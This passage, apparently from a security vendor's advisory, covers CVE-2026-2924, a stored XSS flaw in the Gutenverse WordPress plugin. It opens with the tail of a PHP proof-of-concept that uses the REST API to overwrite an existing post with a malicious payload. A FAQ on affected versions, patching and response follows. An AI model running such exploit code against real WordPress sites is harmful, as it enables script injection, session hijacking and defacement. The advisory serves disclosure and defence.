if ($http_code !== 201) {
    echo "[+] Attempting to update existing post...n";
    // Get first available post
    curl_setopt($ch, CURLOPT_URL, $posts_endpoint . '?per_page=1');
    curl_setopt($ch, CURLOPT_POST, false);
    $response = curl_exec($ch);
    $posts = json_decode($response, true);
    
    if (!empty($posts)) {
        $post_id = $posts[0]['id'];
        curl_setopt($ch, CURLOPT_URL, $posts_endpoint . '/' . $post_id);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
            'content' => $malicious_content
        ]));
        
        $response = curl_exec($ch);
        if (curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200) {
            echo "[+] Post updated with malicious payloadn";
        }
    }
}

curl_close($ch);

// Helper function to extract nonce (simplified placeholder)
function extract_nonce($html) {
    // In a real PoC, this would parse the HTML for _wpnonce or REST API nonce
    // For demonstration, returning a placeholder
    return 'nonce_extraction_needed';
}

echo "[+] PoC complete. The XSS payload will execute when users view the post.n";
?>

Frequently Asked Questions

What is CVE-2026-2924?
Understanding the vulnerability
CVE-2026-2924 is a stored cross-site scripting (XSS) vulnerability found in the Gutenverse WordPress plugin versions up to and including 3.4.6. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘imageLoad’ parameter, which can execute when other users view the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s handling of user-controlled data. An attacker can craft a payload containing JavaScript code that gets stored in the database and executed in the context of any user who views the compromised page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Gutenverse plugin version 3.4.6 or earlier is affected. Specifically, authenticated users with contributor-level permissions or higher can exploit this vulnerability, potentially impacting all users who visit the compromised content.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Gutenverse plugin installed on your WordPress site. If it is version 3.4.6 or earlier, your site is at risk. Additionally, review any posts created or edited by users with contributor access for suspicious scripts.
What steps should I take to fix this issue?
Mitigation and patching
To fix this issue, update the Gutenverse plugin to version 3.4.7 or later, which contains the necessary security patches. Regularly check for updates and apply them promptly to mitigate future vulnerabilities.
What does the CVSS score of 6.4 mean?
Risk assessment
The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the highest level of risk, it can still lead to significant consequences, such as data theft or account compromise, especially if exploited by an authenticated user.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can use the WordPress REST API to log in as a contributor and inject a malicious payload into the ‘imageLoad’ parameter. This payload is designed to execute JavaScript when the compromised content is viewed, demonstrating the risk of stored XSS.
Can this vulnerability lead to further attacks?
Potential consequences
Yes, successful exploitation of this vulnerability can lead to session hijacking, content defacement, or redirection to malicious sites. If an attacker can execute JavaScript in a user’s browser, they may steal authentication cookies or escalate privileges.
What are the best practices to prevent similar vulnerabilities?
Security recommendations
To prevent similar vulnerabilities, always keep WordPress plugins and themes updated to their latest versions. Implement security measures such as input validation, output escaping, and regular security audits to identify and mitigate potential risks.
Is it safe to use the Gutenverse plugin after patching?
Post-update considerations
Yes, after updating to version 3.4.7 or later, the Gutenverse plugin should be safe to use. However, it is essential to monitor for any new vulnerabilities and to apply updates as they become available.
What should I do if I suspect my site has been compromised?
Response steps
If you suspect your site has been compromised, immediately update the Gutenverse plugin and conduct a thorough security audit. Check for unauthorized changes, reset user passwords, and consider restoring your site from a backup if necessary.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations